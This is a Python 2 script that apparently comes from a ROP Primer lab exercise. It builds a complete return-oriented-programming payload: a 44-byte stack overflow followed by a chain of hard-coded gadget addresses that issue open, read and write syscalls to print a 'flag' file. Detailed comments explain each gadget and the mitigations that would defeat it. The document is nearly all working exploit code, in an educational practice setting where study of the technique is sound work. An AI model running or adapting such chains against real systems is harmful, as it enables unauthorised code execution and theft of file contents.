ROP Primer level2 - open, read and print flag file
import struct
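def p(value):
    """Pack *value* as a 32-bit little-endian unsigned integer.

    Every gadget address and immediate in the chain below goes through this
    helper so that it lands in memory in the x86 byte order the target reads.

    Args:
        value: integer in the range 0..0xffffffff.

    Returns:
        The 4-byte packed form (``str`` on Python 2, ``bytes`` on Python 3).
        The rest of this script concatenates the result with ``str`` literals
        and uses the ``print`` statement, so as written it runs on Python 2 only.

    Raises:
        struct.error: if *value* is negative or does not fit in 32 bits.
    """
    # Dropped the stray trailing semicolon of the original one-liner.
    return struct.pack('<L', value)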
# Absolute addresses inside the level2 target binary; every value below is
# taken from the write-up as-is.  Hard-coding them is only possible because
# the binary sits at a fixed load address -- PIE/ASLR would invalidate all of
# them, which is why that mitigation defeats this style of chain outright.
writeable_buffer = 0x080ca004 # scratch area the chain stores into (filename, later file contents); presumably .data/.bss -- confirm
open_addr = 0x80515f0 # open/read/write wrapper addresses: defined but never
read_addr = 0x80516a0 # referenced by the chain below, which issues raw
write_addr = 0x8051700 # int 0x80 syscalls instead
pop_eax = 0x080a81d6 # by usage, pop eax; ret (every use is followed by exactly one immediate)
pop_edx = 0x08052476 # by usage, pop edx; ret
pop_ebx = 0x0805249e # unused; note it is pop_ecx_pop_ebx + 1, i.e. presumably the same gadget entered one byte later
pop_ecx_pop_ebx = 0x0805249d # by usage, pop ecx; pop ebx; ret (two immediates follow each use)
inc_eax = 0x0806a2ef # no side effect noted, unlike the two gadgets below -- presumably a clean inc eax; ret
inc_ebx = 0x08082cb0 # inc ebx; or al, -0x15; ret   <- the `or al` dirties eax, so eax is zeroed only after these run
inc_ecx = 0x08083c16 # inc ecx; adc al, 0x39; ret   <- likewise dirties eax
mov_eax_edx = 0x08083d68 # mov [eax], edx; pop ebx; pop ebp; ret   (two dummy dwords must follow each use)
mov_edx_eax = 0x08078e71 # presumably mov [edx], eax; ret -- inferred only from the name and its use below; confirm
xor_eax_eax = 0x08097a7f # eax = 0: used to start each syscall number from a known value and to obtain a NUL dword
popret = 0x8048560 # popret/pop2ret/pop3ret are unused by the chain; pop2ret = pop3ret + 1,
pop2ret = 0x8048893 # so the last two look like one pop;pop;pop;ret gadget entered at
pop3ret = 0x8048892 # different offsets (inferred from the values only)
int_0x80 = 0x08052ba0 # presumably int 0x80; ret -- it must return for the chain to issue its three syscalls in sequence
# The chain is built as one flat string and printed to stdout.  It issues three
# raw syscalls back to back: open("flag", O_RDONLY), read(fd, buf, n),
# write(1, buf, n).  The 44-byte filler suggests a plain stack buffer overflow
# of the saved return address (not verified here); a stack canary would stop
# the overwrite and PIE would break every hard-coded address above.
payload = ''
payload += 'A'*44 # filler up to the saved return address; the offset is specific to the level2 stack frame
# 1/ put "flag" in memory
payload += p(pop_eax)
payload += p(writeable_buffer) # eax = destination address
payload += p(pop_edx)
payload += 'flag' # edx = the four ASCII bytes of the filename (exactly one dword, so a single pop suffices)
payload += p(mov_eax_edx) # [eax] = edx -> "flag" now sits at writeable_buffer
payload += 'AAAA' # dummy for pop ebx (the store gadget pops two registers before returning)
payload += 'AAAA' # dummy for pop ebp
# Null-terminate flag string
payload += p(xor_eax_eax) # eax = 0: the NUL dword to store
payload += p(pop_edx)
payload += p(writeable_buffer+0x4) # edx = address just past "flag"
payload += p(mov_edx_eax) # presumably [edx] = eax, giving "flag\0\0\0\0" -- see note on the gadget above
# 2/ open file
# open(pathname, flags)
# eax = 0x05, ebx = filename, ecx = flags
payload += p(pop_ecx_pop_ebx)
payload += p(0xffffffff) # ecx = -1 (a literal 0 would put NUL bytes into the chain)
payload += p(writeable_buffer) # ebx = buffer
payload += p(inc_ecx) # ecx = 0, i.e. O_RDONLY (the original comment said ebx; the gadget increments ecx)
payload += p(xor_eax_eax) # must come AFTER inc_ecx, whose trailing `adc al, 0x39` clobbers al
payload += p(inc_eax) # eax = 1
payload += p(inc_eax) # eax = 2
payload += p(inc_eax) # eax = 3
payload += p(inc_eax) # eax = 4
payload += p(inc_eax) # eax = 5 (SYS_open)
payload += p(int_0x80) # GO!  eax now holds the new descriptor; the chain assumes it is 3 (see below)
# 3/ read(fd, addr, count)
# eax = 0x03, ebx = fd, ecx = writeable_buffer, edx = count
payload += p(pop_ecx_pop_ebx)
payload += p(writeable_buffer) # ecx = destination; this overwrites "flag\0", which is fine since the name is no longer needed
payload += p(0xffffffff) # ebx = -1
payload += p(inc_ebx) # ebx = 0
payload += p(inc_ebx) # ebx = 1
payload += p(inc_ebx) # ebx = 2
payload += p(inc_ebx) # ebx = 3 <- assumes open() returned fd 3 (only 0/1/2 already open); nothing checks this
payload += p(xor_eax_eax) # after the inc_ebx gadgets, whose `or al, -0x15` dirties al
payload += p(inc_eax) # eax = 1
payload += p(inc_eax) # eax = 2
payload += p(inc_eax) # eax = 3 (SYS_read)
payload += p(pop_edx)
payload += p(0x01010101) # count; no null bytes -- far larger than the buffer, so this relies on the flag file being small
payload += p(int_0x80) # GO!
# 4/ write(fd, addr, count) to STDOUT
# eax = 0x04, ebx = fd, ecx = writeable_buffer, edx = count
payload += p(pop_ecx_pop_ebx)
payload += p(writeable_buffer) # ecx = source buffer (now holding the file contents)
payload += p(0xffffffff) # ebx = -1
payload += p(inc_ebx) # ebx = 0
payload += p(inc_ebx) # ebx = 1 (stdout)
payload += p(xor_eax_eax) # again only after the inc_ebx gadgets
payload += p(inc_eax) # eax = 1
payload += p(inc_eax) # eax = 2
payload += p(inc_eax) # eax = 3
payload += p(inc_eax) # eax = 4 (SYS_write)
payload += p(pop_edx)
payload += p(0x01010101) # no null bytes -- the same oversized count, so the output likely includes memory after the flag
payload += p(int_0x80) # GO!
payload += 'BBBB' # just crash here (deliberately invalid return address once the write has happened)
print payload # Python 2 print statement; note it appends a trailing newline to the chain